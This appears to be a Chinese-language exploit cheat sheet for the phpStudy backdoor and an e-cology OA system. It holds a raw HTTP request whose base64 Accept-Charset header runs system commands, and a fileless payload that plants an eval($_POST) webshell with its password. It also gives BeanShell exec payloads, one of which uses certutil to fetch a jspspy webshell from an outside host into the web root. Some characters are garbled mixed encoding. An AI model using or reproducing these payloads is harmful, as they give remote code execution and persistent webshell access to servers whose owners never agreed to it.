title:'phpstudy探針"

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

1. accept-charset 后面是執(zhí)行語句，經(jīng)過base64編碼過

   
   
   0.jpg
   
   
   1.jpg
2. 引用大佬的getshell方式(如有侵權(quán)立即刪除)

http://sbd.ximcx.cn/OAandPHPstudy/

phpstudybackdoor無文件落地getshell（蟻劍連接）：
Accept-Encoding: gzip,deflate
Accept-Charset: ZXZhbCgkX1BPU1RbdDAwbHNdKTs=
密碼：t00ls

某OA：Windows，Linux同理，只要把馬放到\ecology\filesystem\下就行，測試原版菜刀馬和jspspy馬兼容性最好，連接地址：http://127.0.0.1/filesystem/jspspy.jsp
bsh.script=exec("cmd+/c+dir+..\ecology\filesystem\");
bsh.script=exec("certutil.exe -split -urlcache -f http://ximcx.cn/content/uploadfile/201807/jspspy.txt 盤符路徑\ecology\filesystem\jspspy.jsp");